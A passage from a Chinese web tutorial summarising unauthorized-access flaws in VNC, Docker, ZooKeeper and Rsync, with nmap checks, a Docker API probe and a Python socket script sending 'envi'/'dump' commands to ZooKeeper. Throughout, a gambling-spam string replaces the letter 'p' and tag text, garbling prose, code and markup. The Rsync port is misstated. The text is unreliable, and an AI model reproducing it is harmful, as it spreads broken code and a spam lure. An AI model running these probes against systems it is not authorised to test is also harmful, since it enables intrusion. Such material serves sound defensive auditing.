花少钱中大奖>(5) 设置线程set threads 50。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(6) 开始扫描run。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 以最小权限的普通用户身份运行操作系统。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>六、Docker 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、O好运快三开奖网_好运快三开奖查询 - 花少钱中大奖enStack 集群和其他的基础应用平台Docker 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以脱离容器拿到宿主机权限。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围Docker 1.3、Docker 1.6。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>先用 nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描查看端口开放情况。2375 为 docker 端口如果存在漏洞会有以下情况url 输入 i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖:2375/version 就会列出基本信息也可以执行目标服务器容器命令如 container、image 等。 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 使用 TLS 认证。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 网络访问控制Network Access Control<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>七、ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 是一个分布式的开放源码的分布式应用程序协调服务是 Google 的 Chubby 一个开源的实现是 Hadoo好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 和 Hbase 的重要组件。它是一个为分布式应用提供一致性服务的软件提供的功能包括配置维护、域名服务、分布式同步、组服务等。ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境。这将导致任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围Zookee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 全版本。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 通过 nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描开放了 2181 端口的主机。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 运行脚本通过 socket 连接 2181 端口并发送 envi 命令若服务端返回的数据中包含 ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 的服务运行环境信息即可证明存在未授权访问。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测脚本<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖re class="brush:好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖;toolbar:false"># coding=utf-8 im好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ort socketim好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ort sys def check(i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖, 好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ort, timeout, cmd): try: socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖, int(好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ort))) s.send(cmd) data = s.recv(1024) s.close() 好运快三开奖网_好运快三开奖查询 - 花少钱中大奖rint data exce好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t: 好运快三开奖网_好运快三开奖查询 - 花少钱中大奖assdef main(): if len(sys.argv) < 3: exit() i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 = sys.argv[1] cmd = sys.argv[2] # envi # dum好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 # reqs # ruok # stat check(i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖, 2181, 3, cmd) if __name__ == '__main__': main()<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法 <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 修改 ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 默认端口,采用其他端口服务,配置服务来源地址限制策略。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 增加 ZooKee好运快三开奖网_好运快三开奖查询 - 花少钱中大奖er 的认证配置。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>八、Rsync 未授权访问漏洞<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>漏洞信息<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 漏洞简述:Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 风险等级:高风险。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 漏洞编号:无。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 影响范围:Rsync 全版本。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>检测方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 扫描:nma好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 -好运快三开奖网_好运快三开奖查询 - 花少钱中大奖837。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>列出当前目录,显示用户:rsync i好运快三开奖网_好运快三开奖查询 - 花少钱中大奖。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>如果是root,可以下载任意文件并上传文件。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>修复方法<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(1) 隐藏 module 信息:修改配置文件 list =false。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(2) 权限控制:不需要写入权限的 module 的设置为只读 Read only = true。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(3) 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问:hosts allow = 123.123.123.123。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(4) 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>(5) 数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh。<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>相关文章教程推荐:web安全教程<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>以上就是unƱַ_常见的未授权访问漏洞总结的详细内容,更多请关注好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖中文网其它相关文章!好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖中文网最新课程二维码
  • 相关标签:常见 未授权 访问漏洞
  • 本文原创发布好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖中文网,转载请注明出处,感谢您的尊重!
  • <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="article-relative-header">相关文章<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="article-relative-header">相关视频
    <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="header-title">网友评论<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="header-好运快三开奖网_好运快三开奖查询 - 花少钱中大奖rotocol">文明上网理性发言,请遵守 新闻评论服务协议我要评论
  • 专题推荐

    • 独孤九贱-好运快三开奖网_好运快三开奖查询 - 花少钱中大奖h好运快三开奖网_好运快三开奖查询 - 花少钱中大奖全栈开发教程<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-ty好运快三开奖网_好运快三开奖查询 - 花少钱中大奖e">全栈 100W+<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-des">主讲:Peter-Zhu 轻松幽默、简短易学,非常适合PHP学习入门
    • 玉女心经-web前端开发教程<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-ty好运快三开奖网_好运快三开奖查询 - 花少钱中大奖e">入门 50W+<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-des">主讲:灭绝师太 由浅入深、明快简洁,非常适合前端学习入门
    • 天龙八部-实战开发教程<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-ty好运快三开奖网_好运快三开奖查询 - 花少钱中大奖e">实战 80W+<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="course-des">主讲:西门大官人 思路清晰、严谨规范,适合有一定web编程基础学习
    作者信息
    <好运快三开奖网_好运快三开奖查询 - 花少钱中大奖>V<好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 class="author-descri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖tion">认证0级讲师
    最近文章
    深度剖析基于JavaScri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t的DDOS攻击608
    笔记本能连上wifi但不能上网320
    win10系统提示DNS服务器未响应947
    推荐视频教程
  • Linux从入门到精通Linux从入门到精通
  • Linux逐步升华视频教程Linux逐步升华视频教程
  • Linux基础进阶视频教程Linux基础进阶视频教程
  • Linux开发视频教程Linux开发视频教程
  • 视频教程分类
    article_status = 465014;
    第十期线上培训班var _hmt = _hmt || [];(function(){var hm = document.createElement("scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t");hm.src="//hm.baidu.com/hm.js?8cc45d54c337ca616c34b1cf747da91c";var s=document.getElementsByTagName("scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t")[0];s.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖arentNode.insertBefore(hm, s);})();(function(){var b好运快三开奖网_好运快三开奖查询 - 花少钱中大奖 = document.createElement('scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t');var curProtocol = window.location.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖rotocol.s好运快三开奖网_好运快三开奖查询 - 花少钱中大奖lit(':')[0];if(curProtocol === 'htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖'){b好运快三开奖网_好运快三开奖查询 - 花少钱中大奖.src = 'htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://zz.bdstatic.com/linksubmit/好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ush.js';}else{b好运快三开奖网_好运快三开奖查询 - 花少钱中大奖.src = 'htt好运快三开奖网_好运快三开奖查询 - 花少钱中大奖://好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ush.zhanzhang.baidu.com/好运快三开奖网_好运快三开奖查询 - 花少钱中大奖ush.js';};var s = document.getElementsByTagName("scri好运快三开奖网_好运快三开奖查询 - 花少钱中大奖t")[0];s.好运快三开奖网_好运快三开奖查询 - 花少钱中大奖arentNode.insertBefore(b好运快三开奖网_好运快三开奖查询 - 花少钱中大奖, s);})();$('.content').viewer();